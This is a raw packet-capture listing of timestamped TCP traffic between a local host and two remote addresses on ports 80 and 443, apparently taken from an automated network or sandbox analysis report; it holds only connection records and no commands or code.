                                                                                                                                                            Dec 13, 2024 07:38:12.645116091 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.645345926 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.645378113 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.645436049 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.649290085 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.649352074 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.649403095 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.649467945 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.653489113 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.653548956 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.653599024 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.653666019 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.657660007 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.657787085 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.657815933 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.657871962 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.661823034 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.661923885 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.661957026 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.661990881 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.665958881 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.666054964 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.666086912 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.666155100 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.670152903 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.670222044 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.670280933 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.670337915 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.674273968 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.674408913 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.674437046 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.674463034 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.678447008 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.678520918 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.678570986 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.678646088 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.682666063 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.682750940 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.682789087 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.682789087 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.686815023 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.686904907 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.686964989 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.686964989 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.690963984 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.691024065 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.691071987 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.691168070 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.695204020 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.695249081 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.695274115 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.695344925 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.699302912 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.699378014 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.699426889 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.699496984 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.703496933 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.703589916 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.703619003 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.703660011 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.707755089 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.707844019 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.707936049 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.708045006 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.711791992 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.711910963 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.711971045 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.711971045 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.715953112 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.716046095 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.716063976 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.716602087 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.720149040 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.720247030 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.720272064 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.720355034 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.724301100 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.724423885 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.724477053 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.724477053 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.728475094 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.728533030 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.728584051 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.728584051 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.732673883 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.732798100 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.732827902 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.732892036 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.736759901 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.736900091 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.822738886 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.822807074 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.823020935 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.823648930 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.823782921 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.824412107 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.827375889 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.827462912 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.827483892 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.827634096 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.831067085 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.831161022 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.831214905 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.831214905 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.834670067 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.834882975 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.834918976 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.834949017 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:17.053981066 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:17.054055929 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:18.034337997 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:18.034389973 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:18.034457922 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:18.118273020 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:18.118321896 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:19.342844009 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:19.342941999 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:19.346014977 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:19.346035957 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:19.346457005 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:19.393392086 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:19.417907953 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:19.459340096 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:19.509449005 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:19.794334888 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:19.846529961 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:19.915616035 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:19.915633917 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:19.915714025 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:19.915762901 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:19.915791035 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:19.915811062 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:19.915847063 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:19.915847063 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:19.915878057 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:19.915900946 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:19.915932894 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.029659033 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.029679060 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.029748917 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.029759884 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.029764891 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.029820919 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.029855013 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.029855013 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.029932022 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.075148106 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.075179100 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.075351954 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.075385094 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.075483084 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.200217009 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.200248003 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.200323105 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.200368881 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.200404882 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.201411009 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.233578920 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.233606100 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.233679056 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.233692884 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.237420082 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.260000944 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.260023117 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.260086060 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.260107040 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.260137081 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.260157108 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.282815933 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.282866955 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.282922029 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.282954931 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.282983065 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.283004045 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.386625051 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.386657000 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.386734962 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.386773109 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.386789083 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.386892080 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.407771111 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.407799006 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.407838106 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.407846928 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.407861948 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.407892942 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.426707029 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.426755905 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.426789999 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.426800013 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.426821947 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.426840067 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.442887068 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.442934990 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.443089962 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.443090916 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.443130970 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.443722010 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.462788105 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.462807894 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.462877989 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.462896109 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.462925911 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.463479042 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.479141951 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.479192019 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.479228973 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.479248047 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.479276896 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.479865074 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.497745991 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.497770071 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.497945070 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.497956991 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.498003006 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.855206966 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.855247974 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.855299950 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.855377913 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.855406046 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.855427027 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.855456114 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.855494976 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.855540991 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.855566025 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.855571985 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.855606079 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.855622053 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.856661081 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.856704950 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.856745005 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.856750965 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.856779099 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.856789112 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.858026028 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.858079910 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.858109951 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.858120918 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.858134985 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.858160973 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.859093904 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.859141111 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.859169960 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.859177113 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.859196901 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.859219074 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.860038042 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.860081911 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.860109091 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.860115051 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.860131025 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.860152960 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.860974073 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.861036062 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.861053944 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.861061096 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.861093044 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.861105919 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.862608910 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.862660885 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.862689018 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.862695932 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.862724066 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.862734079 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.862931967 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.862974882 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.863002062 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.863008022 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.863034010 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.863044024 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.864339113 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.864382982 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.864408016 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.864413977 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.864437103 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.864456892 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.867069960 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.867114067 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.867141962 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.867149115 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.867173910 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.867194891 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.867283106 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.867352009 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.867361069 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.867382050 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.867410898 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.867425919 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.979285955 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.979381084 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.979401112 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.979450941 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.979490042 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.979513884 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.985965014 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.986016989 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.986067057 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.986083984 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.986114025 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.986134052 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:20.992697001 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:20.992744923 CET44349733151.101.1.137192.168.2.4
